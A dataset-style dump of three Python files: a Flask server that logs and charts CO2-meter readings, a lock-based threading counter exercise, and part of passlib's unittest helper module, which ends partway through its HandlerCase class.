source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
server.py
|
# coding=utf-8
""" Flask server for CO2meter
(c) Vladimir Filimonov, 2018-2021
E-mail: vladimir.a.filimonov@gmail.com
"""
import optparse
import logging
import threading
import time
import glob
import os
import socket
import signal
import json
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import flask
from flask import request, render_template, jsonify
import pandas as pd
import co2meter as co2
_DEFAULT_HOST = '127.0.0.1'
_DEFAULT_PORT = '1201'
_DEFAULT_INTERVAL = 30 # seconds
_DEFAULT_NAME = 'co2'
_INIT_TIME = 30 # time to initialize and calibrate device
_URL = 'https://github.com/vfilimonov/co2meter'
_COLORS = {'r': '#E81F2E', 'y': '#FAAF4C', 'g': '#7FB03F'}
_IMG_G = '1324881/36358454-d707e2f4-150e-11e8-9bd1-b479e232f28f'
_IMG_Y = '1324881/36358456-d8b513ba-150e-11e8-91eb-ade37733b19e'
_IMG_R = '1324881/36358457-da3e3e8c-150e-11e8-85af-855571275d88'
_RANGE_MID = [800, 1200]
_CO2_MAX_VALUE = 3200 # Cut our yaxis here
_DEGREES_CELSIUS = "℃" # Unicode U+2103, Degree Celisus
_DEGREES_FAHRENHEIT = "℉" # Unicode U+2109, Degree Fahrenheit
_name = _DEFAULT_NAME
_fahrenheit = False
_tight_margins=False
###############################################################################
mon = None
###############################################################################
app = flask.Flask(__name__)
app.jinja_env.auto_reload = True
app.config['TEMPLATES_AUTO_RELOAD'] = True
###############################################################################
@app.route('/')
def home():
# Read CO2 and temp values
if mon is None:
status = '<h1 align="center" style="color:%s;">Device is not connected</h1>' % _COLORS['r']
else:
status = ''
try:
vals = list(mon._last_data)
vals[-1] = '%.1f' % vals[-1]
except:
data = read_logs()
vals = data.split('\n')[-2].split(',')
if status == '':
status = '<h1 align="center" style="color:%s;">Device is not ready</h1>' % _COLORS['r']
# Select image and color
if int(vals[1]) >= _RANGE_MID[1]:
color = _COLORS['r']
img = _IMG_R
elif int(vals[1]) < _RANGE_MID[0]:
color = _COLORS['g']
img = _IMG_G
else:
color = _COLORS['y']
img = _IMG_Y
co2 = '<font color="%s">%s ppm</font>' % (color, vals[1])
temperature = vals[2]
deg = _DEGREES_CELSIUS
global _fahrenheit
if _fahrenheit:
deg = _DEGREES_FAHRENHEIT
temperature = round(celsiusToFahrenheit(temperature), ndigits=1)
# Return template
return render_template('index.html', image=img, timestamp=vals[0],
co2=vals[1], color=color, temp=temperature, url=_URL,
status=status, degrees=deg)
#############################################################################
@app.route('/log', defaults={'logname': None})
@app.route('/log/<string:logname>')
def log(logname):
data = read_logs(name=logname)
return '<h1>Full log</h1>' + wrap_table(data)
@app.route('/log.csv', defaults={'logname': None})
@app.route('/log/<string:logname>.csv')
def log_csv(logname):
data = read_logs(name=logname)
return wrap_csv(data, logname)
@app.route('/log.json', defaults={'logname': None})
@app.route('/log/<string:logname>.json')
def log_json(logname):
data = read_logs(name=logname)
return wrap_json(data)
#############################################################################
@app.route('/rename')
def get_shape_positions():
args = request.args
logging.info('rename', args.to_dict())
new_name = args.get('name', default=None, type=str)
if new_name is None:
return 'Error: new log name is not specified!'
global _name
_name = new_name
return 'Log name has changed to "%s"' % _name
#############################################################################
@app.route('/kill')
def shutdown():
server_stop()
global _monitoring
_monitoring = False
return 'Server shutting down...'
#############################################################################
# Dashboard on plotly.js
#############################################################################
def prepare_data(name=None, span='24H'):
data = read_logs(name)
data = pd.read_csv(StringIO(data), parse_dates=[0]).set_index('timestamp')
if span != 'FULL':
data = data.last(span)
global _fahrenheit
if _fahrenheit:
data['temp'] = data['temp'].apply(celsiusToFahrenheit)
if span == '1H':
# int64 has problems with serialisation, translate to floats
data['co2'] = pd.to_numeric(data['co2'], downcast='float')
elif span == '24H':
data = data.resample('60s').mean()
elif span == '7D':
data = data.resample('600s').mean()
elif span == '30D':
data = data.resample('1H').mean()
elif span == 'FULL':
if len(data) > 3000: # Resample only long series
data = data.resample('1H').mean()
data = data.round({'co2': 0, 'temp': 1})
return data
def rect(y0, y1, color):
return {'type': 'rect', 'layer': 'below',
'xref': 'paper', 'x0': 0, 'x1': 1,
'yref': 'y', 'y0': y0, 'y1': y1,
'fillcolor': color, 'opacity': 0.2, 'line': {'width': 0}}
def caption(title, x, y):
return {'xref': 'paper', 'yref': 'paper', 'x': x, 'y': y, 'text': title,
'showarrow': False, 'font': {'size': 16},
'xanchor': 'center', 'yanchor': 'bottom'}
#############################################################################
@app.route("/chart/", strict_slashes=False)
@app.route("/chart/<name>", strict_slashes=False)
@app.route("/chart/<name>/<freq>", strict_slashes=False)
def chart_co2_temp(name=None, freq='24H'):
data = prepare_data(name, freq)
defaultTMin = 15
defaultTMax = 27
temperatureData = data['temp']
deg = _DEGREES_CELSIUS
global _fahrenheit
if _fahrenheit:
defaultTMin = 60
defaultTMax = 80
deg = _DEGREES_FAHRENHEIT
if _tight_margins:
co2_min = data['co2'].min() * 0.95
co2_max = data['co2'].max() * 1.05
t_min = data['temp'].min() * 0.95
t_max = data['temp'].max() * 1.05
else:
co2_min = min(500, data['co2'].min() - 50)
co2_max = min(max(2000, data['co2'].max() + 50), _CO2_MAX_VALUE)
t_min = min(defaultTMin, temperatureData.min())
t_max = max(defaultTMax, temperatureData.max())
rect_green = rect(co2_min, _RANGE_MID[0], _COLORS['g'])
rect_yellow = rect(_RANGE_MID[0], _RANGE_MID[1], _COLORS['y'])
rect_red = rect(_RANGE_MID[1], co2_max, _COLORS['r'])
# Check if mobile
try:
agent = request.headers.get('User-Agent')
phones = ['iphone', 'android', 'blackberry', 'fennec', 'iemobile']
staticPlot = any(phone in agent.lower() for phone in phones)
except RuntimeError:
staticPlot = False
# Make figure
index = data.index.format()
co2 = list(pd.np.where(data.co2.isnull(), None, data.co2))
temp = list(pd.np.where(data.temp.isnull(), None, data.temp))
d_co2 = {'mode': 'lines+markers', 'type': 'scatter',
'name': 'CO2 concentration (ppm)',
'xaxis': 'x1', 'yaxis': 'y1',
'x': index, 'y': co2}
d_temp = {'mode': 'lines+markers', 'type': 'scatter',
'name': 'Temperature (°C)',
'xaxis': 'x1', 'yaxis': 'y2',
'x': index, 'y': temp}
config = {'displayModeBar': False, 'staticPlot': staticPlot}
layout = {'margin': {'l': 30, 'r': 10, 'b': 30, 't': 30},
'showlegend': False,
'shapes': [rect_green, rect_yellow, rect_red],
'xaxis1': {'domain': [0, 1], 'anchor': 'y2'},
'yaxis1': {'domain': [0.55, 1], 'anchor': 'free', 'position': 0,
'range': [co2_min, co2_max]},
'yaxis2': {'domain': [0, 0.45], 'anchor': 'x1',
'range': [t_min, t_max]},
'annotations': [caption('CO2 concentration (ppm)', 0.5, 1),
caption(f'Temperature ({deg})', 0.5, 0.45)]
}
fig = {'data': [d_co2, d_temp], 'layout': layout, 'config': config}
return jsonify(fig)
#############################################################################
@app.route("/dashboard")
def dashboard_plotly():
# Get list of files
files = glob.glob('logs/*.csv')
files = [os.path.splitext(os.path.basename(_))[0] for _ in files]
# And find selected for jinja template
files = [(_, _ == _name) for _ in files]
return render_template('dashboard.html', files=files)
#############################################################################
# Monitoring routines
#############################################################################
def read_logs(name=None):
""" read log files """
if name is None:
name = _name
with open(os.path.join('logs', name + '.csv'), 'r') as f:
data = f.read()
return data
#############################################################################
def write_to_log(vals):
""" file name for a current log """
# Create file if does not exist
fname = os.path.join('logs', _name + '.csv')
if not os.path.exists('logs'):
os.makedirs('logs')
if not os.path.isfile(fname):
with open(fname, 'a') as f:
f.write('timestamp,co2,temp\n')
# Append to file
with open(fname, 'a') as f:
f.write('%s,%d,%.1f\n' % vals)
def read_co2_data(bypass_decrypt):
""" A small hack to read co2 data from monitor in order to account for case
when monitor is not initialized yet
"""
global mon
if mon is None:
# Try to initialize
try:
mon = co2.CO2monitor(bypass_decrypt=bypass_decrypt)
# Sleep. If we read from device before it is calibrated, we'll
# get wrong values
time.sleep(_INIT_TIME)
except OSError:
return None
try:
return mon.read_data_raw(max_requests=1000)
except OSError:
# We kill the link and will require to initialize monitor again next time
mon = None
return None
def monitoring_CO2(interval, bypass_decrypt):
""" Tread for monitoring / logging """
while _monitoring:
# Request concentration and temperature
vals = read_co2_data(bypass_decrypt=bypass_decrypt)
if vals is None:
logging.info('[%s] monitor is not connected' % co2.now())
else:
# Write to log and sleep
logging.info('[%s] %d ppm, %.1f deg C' % tuple(vals))
write_to_log(vals)
# Sleep for the next call
time.sleep(interval)
#############################################################################
def start_monitor(interval=_DEFAULT_INTERVAL, bypass_decrypt=False):
""" Start CO2 monitoring in a thread """
logging.basicConfig(level=logging.INFO)
global _monitoring
_monitoring = True
t = threading.Thread(target=monitoring_CO2, args=(interval, bypass_decrypt, ))
t.start()
return t
#############################################################################
def init_homekit_target(port, host, bypass_decrypt):
from co2meter.homekit import start_homekit
global mon
while mon is None:
time.sleep(5)
logging.info('Starting homekit server')
start_homekit(mon, host=host, port=port, monitoring=False, handle_sigint=False, bypass_decrypt=bypass_decrypt)
def init_homekit(port, host, bypass_decrypt):
# We'll start homekit once the device is connected
t = threading.Thread(target=init_homekit_target, args=(port, host, bypass_decrypt, ))
t.start()
#############################################################################
# Server routines
#############################################################################
def my_ip():
""" Get my local IP address """
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.connect(("8.8.8.8", 80)) # Google Public DNS
return s.getsockname()[0]
def start_server_homekit():
""" Start monitoring, flask/dash server and homekit accessory """
# Based on http://flask.pocoo.org/snippets/133/
from co2meter.homekit import PORT
host = my_ip()
parser = optparse.OptionParser()
parser.add_option("-H", "--host",
help="Hostname of the Flask app [default %s]" % host,
default=host)
parser.add_option("-P", "--port-flask",
help="Port for the Flask app [default %s]" % _DEFAULT_PORT,
default=_DEFAULT_PORT)
parser.add_option("-K", "--port-homekit",
help="Port for the Homekit accessory [default %s]" % PORT,
default=PORT)
parser.add_option("-N", "--name",
help="Name for the log file [default %s]" % _DEFAULT_NAME,
default=_DEFAULT_NAME)
parser.add_option("-b", "--bypass-decrypt",
help="Bypass decrypt (needed for certain models of the device)",
action="store_true", dest="bypass_decrypt")
options, _ = parser.parse_args()
global _name
_name = options.name
# Start monitoring
t_monitor = start_monitor()
# Start a thread that will initialize homekit once device is connected
init_homekit(host=options.host, port=int(options.port_homekit), bypass_decrypt=bool(options.bypass_decrypt))
# Start server
app.run(host=options.host, port=int(options.port_flask))
#############################################################################
def start_server():
""" Runs Flask instance using command line arguments """
# Based on http://flask.pocoo.org/snippets/133/
parser = optparse.OptionParser()
parser.add_option("-H", "--host",
help="Hostname of the Flask app [default %s]" % _DEFAULT_HOST,
default=_DEFAULT_HOST)
parser.add_option("-P", "--port",
help="Port for the Flask app [default %s]" % _DEFAULT_PORT,
default=_DEFAULT_PORT)
parser.add_option("-I", "--interval",
help="Interval in seconds for CO2meter requests [default %d]" % _DEFAULT_INTERVAL,
default=_DEFAULT_INTERVAL)
parser.add_option("-N", "--name",
help="Name for the log file [default %s]" % _DEFAULT_NAME,
default=_DEFAULT_NAME)
parser.add_option("-m", "--nomonitoring",
help="No live monitoring (only flask server)",
action="store_true", dest="no_monitoring")
parser.add_option("-s", "--noserver",
help="No server (only monitoring to file)",
action="store_true", dest="no_server")
parser.add_option("-d", "--debug",
action="store_true", dest="debug",
help=optparse.SUPPRESS_HELP)
parser.add_option("-F", "--fahrenheit",
help="Show the temperature in Fahrenheit [default False]",
action="store_true",
default=False,
dest="fahrenheit")
parser.add_option("-b", "--bypass-decrypt",
help="Bypass decrypt (needed for certain models of the device)",
action="store_true", dest="bypass_decrypt")
parser.add_option("-t", "--tight-margins",
help="Use tight margins when plotting",
action="store_true", dest="tight_margins")
options, _ = parser.parse_args()
if options.debug and not options.no_monitoring:
parser.error("--debug option could be used only with --no_monitoring")
global _name
_name = options.name
global _fahrenheit
_fahrenheit = options.fahrenheit
global _tight_margins
_tight_margins = options.tight_margins
# Start monitoring
if not options.no_monitoring:
start_monitor(interval=int(options.interval), bypass_decrypt=bool(options.bypass_decrypt))
# Start server
if not options.no_server:
app.run(debug=options.debug, host=options.host, port=int(options.port))
def stop_server():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
###############################################################################
def wrap_csv(data, fname='output'):
""" Make CSV response downloadable """
if fname is None:
fname = 'log'
si = StringIO(data)
output = flask.make_response(si.getvalue())
output.headers["Content-Disposition"] = "attachment; filename=%s.csv" % fname
output.headers["Content-type"] = "text/csv"
return output
def wrap_json(data):
""" Convert CSV to JSON and make it downloadable """
entries = [_.split(',') for _ in data.split('\n') if _ != '']
js = [{k: v for k, v in zip(['timestamp', 'co2', 'temp'], x)}
for x in entries[1:]]
return jsonify(js)
def wrap_table(data):
""" Return HTML for table """
res = ('<table><thead><tr><th>Timestamp</th><th>CO2 concentration</th>'
'<th>Temperature</th></tr></thead><tbody>')
for line in data.split('\n')[1:]:
res += '<tr>' + ''.join(['<td>%s</td>' % d for d in line.split(',')]) + '</tr>'
res += '</tbody></table>'
return res
###############################################################################
def celsiusToFahrenheit(c):
return (9 * float(c)) / 5 + 32
###############################################################################
if __name__ == '__main__':
# start_server() will take care of start_monitor()
start_server()
# start_server_homekit()
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python foo.py
#! /usr/bin/env python
from threading import Lock, Thread
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
lock = Lock()
i = 0
def incrementingFunction():
global i
# TODO: increment i 1_000_000 times
for t in range (0, 1000000):
lock.acquire()
i = i + 1
lock.release()
def decrementingFunction():
global i
# TODO: decrement i 1_000_000 times
for t in range (0, 1000000):
lock.acquire()
i = i - 1
lock.release()
def main():
global i
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
# TODO: Start both threads
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
|
utils.py
|
"""helpers for passlib unittests"""
#=============================================================================
# imports
#=============================================================================
from __future__ import with_statement
# core
from binascii import unhexlify
import contextlib
from functools import wraps, partial
import hashlib
import logging; log = logging.getLogger(__name__)
import random
import re
import os
import sys
import tempfile
import threading
import time
from passlib.exc import PasslibHashWarning, PasslibConfigWarning
from passlib.utils.compat import PY3, JYTHON
import warnings
from warnings import warn
# site
# pkg
from passlib import exc
from passlib.exc import MissingBackendError
import passlib.registry as registry
from passlib.tests.backports import TestCase as _TestCase, skip, skipIf, skipUnless, SkipTest
from passlib.utils import has_rounds_info, has_salt_info, rounds_cost_values, \
rng as sys_rng, getrandstr, is_ascii_safe, to_native_str, \
repeat_string, tick, batch
from passlib.utils.compat import iteritems, irange, u, unicode, PY2
from passlib.utils.decor import classproperty
import passlib.utils.handlers as uh
# local
__all__ = [
# util funcs
'TEST_MODE',
'set_file', 'get_file',
# unit testing
'TestCase',
'HandlerCase',
]
#=============================================================================
# environment detection
#=============================================================================
# figure out if we're running under GAE;
# some tests (e.g. FS writing) should be skipped.
# XXX: is there better way to do this?
try:
import google.appengine
except ImportError:
GAE = False
else:
GAE = True
def ensure_mtime_changed(path):
"""ensure file's mtime has changed"""
# NOTE: this is hack to deal w/ filesystems whose mtime resolution is >= 1s,
# when a test needs to be sure the mtime changed after writing to the file.
last = os.path.getmtime(path)
while os.path.getmtime(path) == last:
time.sleep(0.1)
os.utime(path, None)
def _get_timer_resolution(timer):
def sample():
start = cur = timer()
while start == cur:
cur = timer()
return cur-start
return min(sample() for _ in range(3))
TICK_RESOLUTION = _get_timer_resolution(tick)
#=============================================================================
# test mode
#=============================================================================
_TEST_MODES = ["quick", "default", "full"]
_test_mode = _TEST_MODES.index(os.environ.get("PASSLIB_TEST_MODE",
"default").strip().lower())
def TEST_MODE(min=None, max=None):
"""check if test for specified mode should be enabled.
``"quick"``
run the bare minimum tests to ensure functionality.
variable-cost hashes are tested at their lowest setting.
hash algorithms are only tested against the backend that will
be used on the current host. no fuzz testing is done.
``"default"``
same as ``"quick"``, except: hash algorithms are tested
at default levels, and a brief round of fuzz testing is done
for each hash.
``"full"``
extra regression and internal tests are enabled, hash algorithms are tested
against all available backends, unavailable ones are mocked whre possible,
additional time is devoted to fuzz testing.
"""
if min and _test_mode < _TEST_MODES.index(min):
return False
if max and _test_mode > _TEST_MODES.index(max):
return False
return True
#=============================================================================
# hash object inspection
#=============================================================================
def has_relaxed_setting(handler):
"""check if handler supports 'relaxed' kwd"""
# FIXME: I've been lazy, should probably just add 'relaxed' kwd
# to all handlers that derive from GenericHandler
# ignore wrapper classes for now.. though could introspec.
if hasattr(handler, "orig_prefix"):
return False
return 'relaxed' in handler.setting_kwds or issubclass(handler,
uh.GenericHandler)
def get_effective_rounds(handler, rounds=None):
"""get effective rounds value from handler"""
handler = unwrap_handler(handler)
return handler(rounds=rounds, use_defaults=True).rounds
def is_default_backend(handler, backend):
"""check if backend is the default for source"""
try:
orig = handler.get_backend()
except MissingBackendError:
return False
try:
handler.set_backend("default")
return handler.get_backend() == backend
finally:
handler.set_backend(orig)
def iter_alt_backends(handler, current=None, fallback=False):
"""
iterate over alternate backends available to handler.
.. warning::
not thread-safe due to has_backend() call
"""
if current is None:
current = handler.get_backend()
backends = handler.backends
idx = backends.index(current)+1 if fallback else 0
for backend in backends[idx:]:
if backend != current and handler.has_backend(backend):
yield backend
def get_alt_backend(*args, **kwds):
for backend in iter_alt_backends(*args, **kwds):
return backend
return None
def unwrap_handler(handler):
"""return original handler, removing any wrapper objects"""
while hasattr(handler, "wrapped"):
handler = handler.wrapped
return handler
def handler_derived_from(handler, base):
"""
test if <handler> was derived from <base> via <base.using()>.
"""
# XXX: need way to do this more formally via ifc,
# for now just hacking in the cases we encounter in testing.
if handler == base:
return True
elif isinstance(handler, uh.PrefixWrapper):
while handler:
if handler == base:
return True
# helper set by PrefixWrapper().using() just for this case...
handler = handler._derived_from
return False
elif isinstance(handler, type) and issubclass(handler, uh.MinimalHandler):
return issubclass(handler, base)
else:
raise NotImplementedError("don't know how to inspect handler: %r" % (handler,))
@contextlib.contextmanager
def patch_calc_min_rounds(handler):
"""
internal helper for do_config_encrypt() --
context manager which temporarily replaces handler's _calc_checksum()
with one that uses min_rounds; useful when trying to generate config
with high rounds value, but don't care if output is correct.
"""
if isinstance(handler, type) and issubclass(handler, uh.HasRounds):
# XXX: also require GenericHandler for this branch?
wrapped = handler._calc_checksum
def wrapper(self, *args, **kwds):
rounds = self.rounds
try:
self.rounds = self.min_rounds
return wrapped(self, *args, **kwds)
finally:
self.rounds = rounds
handler._calc_checksum = wrapper
try:
yield
finally:
handler._calc_checksum = wrapped
elif isinstance(handler, uh.PrefixWrapper):
with patch_calc_min_rounds(handler.wrapped):
yield
else:
yield
return
#=============================================================================
# misc helpers
#=============================================================================
def set_file(path, content):
"""set file to specified bytes"""
if isinstance(content, unicode):
content = content.encode("utf-8")
with open(path, "wb") as fh:
fh.write(content)
def get_file(path):
"""read file as bytes"""
with open(path, "rb") as fh:
return fh.read()
def tonn(source):
"""convert native string to non-native string"""
if not isinstance(source, str):
return source
elif PY3:
return source.encode("utf-8")
else:
try:
return source.decode("utf-8")
except UnicodeDecodeError:
return source.decode("latin-1")
def hb(source):
"""
helper for represent byte strings in hex.
usage: ``hb("deadbeef23")``
"""
return unhexlify(re.sub(r"\s", "", source))
def limit(value, lower, upper):
if value < lower:
return lower
elif value > upper:
return upper
return value
def quicksleep(delay):
"""because time.sleep() doesn't even have 10ms accuracy on some OSes"""
start = tick()
while tick()-start < delay:
pass
def time_call(func, setup=None, maxtime=1, bestof=10):
"""
timeit() wrapper which tries to get as accurate a measurement as possible w/in maxtime seconds.
:returns:
``(avg_seconds_per_call, log10_number_of_repetitions)``
"""
from timeit import Timer
from math import log
timer = Timer(func, setup=setup or '')
number = 1
end = tick() + maxtime
while True:
delta = min(timer.repeat(bestof, number))
if tick() >= end:
return delta/number, int(log(number, 10))
number *= 10
def run_with_fixed_seeds(count=128, master_seed=0x243F6A8885A308D3):
"""
decorator run test method w/ multiple fixed seeds.
"""
def builder(func):
@wraps(func)
def wrapper(*args, **kwds):
rng = random.Random(master_seed)
for _ in irange(count):
kwds['seed'] = rng.getrandbits(32)
func(*args, **kwds)
return wrapper
return builder
#=============================================================================
# custom test harness
#=============================================================================
class TestCase(_TestCase):
"""passlib-specific test case class
this class adds a number of features to the standard TestCase...
* common prefix for all test descriptions
* resets warnings filter & registry for every test
* tweaks to message formatting
* __msg__ kwd added to assertRaises()
* suite of methods for matching against warnings
"""
#===================================================================
# add various custom features
#===================================================================
#---------------------------------------------------------------
# make it easy for test cases to add common prefix to shortDescription
#---------------------------------------------------------------
# string prepended to all tests in TestCase
descriptionPrefix = None
def shortDescription(self):
"""wrap shortDescription() method to prepend descriptionPrefix"""
desc = super(TestCase, self).shortDescription()
prefix = self.descriptionPrefix
if prefix:
desc = "%s: %s" % (prefix, desc or str(self))
return desc
#---------------------------------------------------------------
# hack things so nose and ut2 both skip subclasses who have
# "__unittest_skip=True" set, or whose names start with "_"
#---------------------------------------------------------------
@classproperty
def __unittest_skip__(cls):
# NOTE: this attr is technically a unittest2 internal detail.
name = cls.__name__
return name.startswith("_") or \
getattr(cls, "_%s__unittest_skip" % name, False)
@classproperty
def __test__(cls):
# make nose just proxy __unittest_skip__
return not cls.__unittest_skip__
# flag to skip *this* class
__unittest_skip = True
#---------------------------------------------------------------
# reset warning filters & registry before each test
#---------------------------------------------------------------
# flag to reset all warning filters & ignore state
resetWarningState = True
def setUp(self):
super(TestCase, self).setUp()
self.setUpWarnings()
def setUpWarnings(self):
"""helper to init warning filters before subclass setUp()"""
if self.resetWarningState:
ctx = reset_warnings()
ctx.__enter__()
self.addCleanup(ctx.__exit__)
# ignore warnings about PasswordHash features deprecated in 1.7
# TODO: should be cleaned in 2.0, when support will be dropped.
# should be kept until then, so we test the legacy paths.
warnings.filterwarnings("ignore", r"the method .*\.(encrypt|genconfig|genhash)\(\) is deprecated")
warnings.filterwarnings("ignore", r"the 'vary_rounds' option is deprecated")
#---------------------------------------------------------------
# tweak message formatting so longMessage mode is only enabled
# if msg ends with ":", and turn on longMessage by default.
#---------------------------------------------------------------
longMessage = True
def _formatMessage(self, msg, std):
if self.longMessage and msg and msg.rstrip().endswith(":"):
return '%s %s' % (msg.rstrip(), std)
else:
return msg or std
#---------------------------------------------------------------
# override assertRaises() to support '__msg__' keyword,
# and to return the caught exception for further examination
#---------------------------------------------------------------
def assertRaises(self, _exc_type, _callable=None, *args, **kwds):
msg = kwds.pop("__msg__", None)
if _callable is None:
# FIXME: this ignores 'msg'
return super(TestCase, self).assertRaises(_exc_type, None,
*args, **kwds)
try:
result = _callable(*args, **kwds)
except _exc_type as err:
return err
std = "function returned %r, expected it to raise %r" % (result,
_exc_type)
raise self.failureException(self._formatMessage(msg, std))
#---------------------------------------------------------------
# forbid a bunch of deprecated aliases so I stop using them
#---------------------------------------------------------------
def assertEquals(self, *a, **k):
raise AssertionError("this alias is deprecated by unittest2")
assertNotEquals = assertRegexMatches = assertEquals
#===================================================================
# custom methods for matching warnings
#===================================================================
def assertWarning(self, warning,
message_re=None, message=None,
category=None,
filename_re=None, filename=None,
lineno=None,
msg=None,
):
"""check if warning matches specified parameters.
'warning' is the instance of Warning to match against;
can also be instance of WarningMessage (as returned by catch_warnings).
"""
# check input type
if hasattr(warning, "category"):
# resolve WarningMessage -> Warning, but preserve original
wmsg = warning
warning = warning.message
else:
# no original WarningMessage, passed raw Warning
wmsg = None
# tests that can use a warning instance or WarningMessage object
if message:
self.assertEqual(str(warning), message, msg)
if message_re:
self.assertRegex(str(warning), message_re, msg)
if category:
self.assertIsInstance(warning, category, msg)
# tests that require a WarningMessage object
if filename or filename_re:
if not wmsg:
raise TypeError("matching on filename requires a "
"WarningMessage instance")
real = wmsg.filename
if real.endswith(".pyc") or real.endswith(".pyo"):
# FIXME: should use a stdlib call to resolve this back
# to module's original filename.
real = real[:-1]
if filename:
self.assertEqual(real, filename, msg)
if filename_re:
self.assertRegex(real, filename_re, msg)
if lineno:
if not wmsg:
raise TypeError("matching on lineno requires a "
"WarningMessage instance")
self.assertEqual(wmsg.lineno, lineno, msg)
class _AssertWarningList(warnings.catch_warnings):
"""context manager for assertWarningList()"""
def __init__(self, case, **kwds):
self.case = case
self.kwds = kwds
self.__super = super(TestCase._AssertWarningList, self)
self.__super.__init__(record=True)
def __enter__(self):
self.log = self.__super.__enter__()
def __exit__(self, *exc_info):
self.__super.__exit__(*exc_info)
if exc_info[0] is None:
self.case.assertWarningList(self.log, **self.kwds)
def assertWarningList(self, wlist=None, desc=None, msg=None):
"""check that warning list (e.g. from catch_warnings) matches pattern"""
if desc is None:
assert wlist is not None
return self._AssertWarningList(self, desc=wlist, msg=msg)
# TODO: make this display better diff of *which* warnings did not match
assert desc is not None
if not isinstance(desc, (list,tuple)):
desc = [desc]
for idx, entry in enumerate(desc):
if isinstance(entry, str):
entry = dict(message_re=entry)
elif isinstance(entry, type) and issubclass(entry, Warning):
entry = dict(category=entry)
elif not isinstance(entry, dict):
raise TypeError("entry must be str, warning, or dict")
try:
data = wlist[idx]
except IndexError:
break
self.assertWarning(data, msg=msg, **entry)
else:
if len(wlist) == len(desc):
return
std = "expected %d warnings, found %d: wlist=%s desc=%r" % \
(len(desc), len(wlist), self._formatWarningList(wlist), desc)
raise self.failureException(self._formatMessage(msg, std))
def consumeWarningList(self, wlist, desc=None, *args, **kwds):
"""[deprecated] assertWarningList() variant that clears list afterwards"""
if desc is None:
desc = []
self.assertWarningList(wlist, desc, *args, **kwds)
del wlist[:]
def _formatWarning(self, entry):
tail = ""
if hasattr(entry, "message"):
# WarningMessage instance.
tail = " filename=%r lineno=%r" % (entry.filename, entry.lineno)
if entry.line:
tail += " line=%r" % (entry.line,)
entry = entry.message
cls = type(entry)
return "<%s.%s message=%r%s>" % (cls.__module__, cls.__name__,
str(entry), tail)
def _formatWarningList(self, wlist):
return "[%s]" % ", ".join(self._formatWarning(entry) for entry in wlist)
#===================================================================
# capability tests
#===================================================================
def require_stringprep(self):
"""helper to skip test if stringprep is missing"""
from passlib.utils import stringprep
if not stringprep:
from passlib.utils import _stringprep_missing_reason
raise self.skipTest("not available - stringprep module is " +
_stringprep_missing_reason)
def require_TEST_MODE(self, level):
"""skip test for all PASSLIB_TEST_MODE values below <level>"""
if not TEST_MODE(level):
raise self.skipTest("requires >= %r test mode" % level)
def require_writeable_filesystem(self):
"""skip test if writeable FS not available"""
if GAE:
return self.skipTest("GAE doesn't offer read/write filesystem access")
#===================================================================
# reproducible random helpers
#===================================================================
#: global thread lock for random state
#: XXX: could split into global & per-instance locks if need be
_random_global_lock = threading.Lock()
#: cache of global seed value, initialized on first call to getRandom()
_random_global_seed = None
#: per-instance cache of name -> RNG
_random_cache = None
def getRandom(self, name="default", seed=None):
"""
Return a :class:`random.Random` object for current test method to use.
Within an instance, multiple calls with the same name will return
the same object.
When first created, each RNG will be seeded with value derived from
a global seed, the test class module & name, the current test method name,
and the **name** parameter.
The global seed taken from the $RANDOM_TEST_SEED env var,
the $PYTHONHASHSEED env var, or a randomly generated the
first time this method is called. In all cases, the value
is logged for reproducibility.
:param name:
name to uniquely identify separate RNGs w/in a test
(e.g. for threaded tests).
:param seed:
override global seed when initialzing rng.
:rtype: random.Random
"""
# check cache
cache = self._random_cache
if cache and name in cache:
return cache[name]
with self._random_global_lock:
# check cache again, and initialize it
cache = self._random_cache
if cache and name in cache:
return cache[name]
elif not cache:
cache = self._random_cache = {}
# init global seed
global_seed = seed or TestCase._random_global_seed
if global_seed is None:
# NOTE: checking PYTHONHASHSEED, because if that's set,
# the test runner wants something reproducible.
global_seed = TestCase._random_global_seed = \
int(os.environ.get("RANDOM_TEST_SEED") or
os.environ.get("PYTHONHASHSEED") or
sys_rng.getrandbits(32))
# XXX: would it be better to print() this?
log.info("using RANDOM_TEST_SEED=%d", global_seed)
# create seed
cls = type(self)
source = "\n".join([str(global_seed), cls.__module__, cls.__name__,
self._testMethodName, name])
digest = hashlib.sha256(source.encode("utf-8")).hexdigest()
seed = int(digest[:16], 16)
# create rng
value = cache[name] = random.Random(seed)
return value
#===================================================================
# other
#===================================================================
_mktemp_queue = None
def mktemp(self, *args, **kwds):
"""create temp file that's cleaned up at end of test"""
self.require_writeable_filesystem()
fd, path = tempfile.mkstemp(*args, **kwds)
os.close(fd)
queue = self._mktemp_queue
if queue is None:
queue = self._mktemp_queue = []
def cleaner():
for path in queue:
if os.path.exists(path):
os.remove(path)
del queue[:]
self.addCleanup(cleaner)
queue.append(path)
return path
def patchAttr(self, obj, attr, value, require_existing=True, wrap=False):
"""monkeypatch object value, restoring original value on cleanup"""
try:
orig = getattr(obj, attr)
except AttributeError:
if require_existing:
raise
def cleanup():
try:
delattr(obj, attr)
except AttributeError:
pass
self.addCleanup(cleanup)
else:
self.addCleanup(setattr, obj, attr, orig)
if wrap:
value = partial(value, orig)
wraps(orig)(value)
setattr(obj, attr, value)
#===================================================================
# eoc
#===================================================================
#=============================================================================
# other unittest helpers
#=============================================================================
RESERVED_BACKEND_NAMES = ["any", "default"]
class HandlerCase(TestCase):
"""base class for testing password hash handlers (esp passlib.utils.handlers subclasses)
In order to use this to test a handler,
create a subclass will all the appropriate attributes
filled as listed in the example below,
and run the subclass via unittest.
.. todo::
Document all of the options HandlerCase offers.
.. note::
This is subclass of :class:`unittest.TestCase`
(or :class:`unittest2.TestCase` if available).
"""
#===================================================================
# class attrs - should be filled in by subclass
#===================================================================
#---------------------------------------------------------------
# handler setup
#---------------------------------------------------------------
# handler class to test [required]
handler = None
# if set, run tests against specified backend
backend = None
#---------------------------------------------------------------
# test vectors
#---------------------------------------------------------------
